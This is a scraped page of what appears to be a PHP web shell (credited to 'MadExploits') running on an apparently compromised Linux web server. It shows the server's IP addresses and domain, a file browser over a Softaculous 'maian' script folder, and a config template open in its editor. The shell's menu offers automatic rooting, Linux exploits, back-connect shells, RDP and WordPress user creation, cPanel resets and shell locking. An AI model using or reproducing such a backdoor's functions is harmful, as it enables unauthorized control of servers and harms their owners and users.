Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.135.195.180
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
maian /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_cfg.php
1.53
KB
-rw-r--r--
changelog.txt
12.17
KB
-rw-r--r--
clone.php
6.23
KB
-rw-r--r--
edit.php
5.09
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
9.03
KB
-rw-r--r--
fileindex.php
90
B
-rw-r--r--
import.php
3.85
KB
-rw-r--r--
info.xml
3.29
KB
-rw-r--r--
install.js
1.17
KB
-rw-r--r--
install.php
5.39
KB
-rw-r--r--
install.xml
1.14
KB
-rw-r--r--
md5
1.37
KB
-rw-r--r--
notes.txt
790
B
-rw-r--r--
update_pass.php
508
B
-rw-r--r--
upgrade.php
4.65
KB
-rw-r--r--
upgrade.xml
356
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _cfg.php
<?php /*---------------------------------------------------------------------------------- SAMPLE CONFIG FILE: Rename or copy this file as '_cfg.php'. EDIT VALUES ON THE RIGHT, DO NOT CHANGE THE VALUES IN CAPITALS!!! ------------------------------------------------------------------------------------*/ /* DATABASE CONNECTION If you are unsure of your database credentials, contact your host ----------------------------------------------------------------------*/ /* MySQL host */ define('DB_HOST', '[[softdbhost]]'); /* MySQL username */ define('DB_USER', '[[softdbuser]]'); /* MySQL password */ define('DB_PASS', '[[softdbpass]]'); /* MySQL database name */ define('DB_NAME', '[[softdb]]'); /* Table prefix. You can have multiple installations in one database if you give each a unique prefix. Only numbers, letters, and underscores */ define('DB_PREFIX', '[[dbprefix]]'); /* Charset used to create database tables. If unsure, don't change. */ define('DB_CHAR_SET', 'utf8'); /* MySQL locale. If unsure, don't change. http://dev.mysql.com/doc/refman/5.0/en/locale-support.html */ define('DB_LOCALE', 'en_GB'); /* MySQL date/time adjustment. You can also use 'system'. May not need changing. */ define('DB_TIMEZONE', '+00:00'); /* SECURITY SALT / HASH Random mix of alphanumeric and special characters to encrypt session/cookie data. Generate hash @ https://www.maianmedia.com/services/keys/ -----------------------------------------------------------------------------------------*/ define('SECRET_KEY', '[[SECRET_KEY]]'); ?>
Close